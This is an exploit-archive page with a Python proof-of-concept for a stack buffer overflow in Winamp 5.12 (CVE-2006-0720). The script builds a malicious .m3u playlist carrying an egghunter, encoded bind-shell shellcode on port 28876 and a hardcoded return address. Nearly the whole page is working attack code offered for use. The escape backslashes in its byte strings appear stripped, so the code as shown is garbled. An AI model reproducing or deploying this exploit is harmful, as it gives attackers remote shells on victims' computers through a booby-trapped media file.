Winamp 5.12 (.m3u) - Stack Based Buffer Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Winamp 5.12 (.m3u) - Stack Based Buffer Overflow
# Published : 2013-06-17
# Author :
# Previous Title : Adrenalin Player 2.2.5.3 (.wax) - SEH Buffer Overflow
# Next Title : Linux kernel perf_swevent_init - Local root Exploit

# Exploit Title: Winamp 5.12 .m3u stack based buffer overflow
# Date: 16 June 2013
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.winamp.com/
# Software Link: http://www.oldapps.com/winamp.php?old_winamp=211
# Version: 5.12
# Tested on: Windows XP Professional SP2, English
# CVE: CVE-2006-0720
# BID: 16785
#
# Description from CVE-2006-0720
# Stack-based buffer overflow in Nullsoft Winamp 5.12 and 5.13 
# allows user-assisted attackers to cause a denial of service 
# (crash) and possibly execute arbitrary code via a crafted 
# .m3u file that causes an incorrect strncpy function call 
# when the player pauses or stops the file.
#
#
# 1. Launch Winamp
# 2. Drag boom.m3u into Winamp window 
# 3. Check for bind shell on port 28876
#

import struct

header =  "#EXTM3Un"
header += "#EXTINF:1234,Pwnage Rockn"

# NTDisplayString
egghunter = (
"x90" * 64 +
"x66x81xcaxffx0fx42x52x6ax43x58" +
"xcdx2ex3cx05x5ax74xefxb8" +
"x77x30x30x74" + # w00t
"x8bxfaxafx75xeaxafx75xe7xffxe7" +
"x90" * 30
)

junk = "x41" * 262 + "x90" * 100 + egghunter

# bind shell on port 28876
# https://code.google.com/p/w32-bind-ngs-shellcode/
# msfencode -i w32-bind-ngs-shellcode.bin -b "x00x0ax0dx5c"
# [*] x86/shikata_ga_nai succeeded with size 241 (iteration=1)
shellcode = (
"w00tw00t" + "x90" * 239 + 
"xbfx26x63xb2x20xdaxccxd9x74x24xf4x5ax33xc9" +
"xb1x36x83xeaxfcx31x7ax10x03x7ax10xc4x96x83" +
"xe9x6cxd2x95xd9xe7x92x59x91x81x46xe9xcbx65" +
"xfcx93x33xfex34x54x7bx18x4cx57xd2x70x9cxc8" +
"xe6xb2x88x90x5exc5x3bx35xe8xa6xb5x5dx9fx5e" +
"x70x5ex89x52x52xadx40x8dx73xdexf9x10x2dx60" +
"xafxc5x9cxe1xa0xc5xbaxa9xb5x48xffxbex96x6f" +
"x87xc1xcdx04x3cxe2x10xf3x95xd3xc0x41x91x20" +
"x74x44x4bxfcx40xeaxa7x8cx84x36xfbx1fxa0x41" +
"x3exc7x3fx46x61x8cx8bxbcx9fx7bx04x0bx8bx2a" +
"x90x38xa8xcdx4fx37x38xcex8bxd6x12x51xadxd1" +
"x11x5ax5fxbfxddx09xa0xefx89x38xdex31x45x36" +
"x6ex13x04x47x40x06xa9x68xf4xd9x79x77x08x56" +
"xb6xedxe7x3fx14xa4xf8x6fxe3x87x73x77xddxd5" +
"x2exefx7dxb7xaaxcfx0cx3bx17x37xa4x6fxfcx81" +
"xfdx86x02x59x85x65x21x36xdbxc7x7bx7ex9cx08" +
"x73x29x71x85xd3x87x8ax7fx38xacx33x7cx29x78" +
"x44x83x55"
)

# 022B368C , call ecx , C:Progam FilesWinamppxsdkpls.dll
ret = struct.pack("<I", 0x022B368C)

# for some reason eip doesn't get overwritten and Winamp 
# crashes differently unless the 4th byte after ret is
# a 0xB0. there's probably an easier way to do this but 
# this is what the fuzzer found first so...
wtf = "x43x43x43xB0"

f = open("boom.m3u", "w")
f.write(header + junk + shellcode + ret + wtf)
f.close()

print "Created boom.m3u"
print "1. Open Winamp"
print "2. Drag boom.m3u into Winamp window"
print "3. Check for bind shell on port 28876"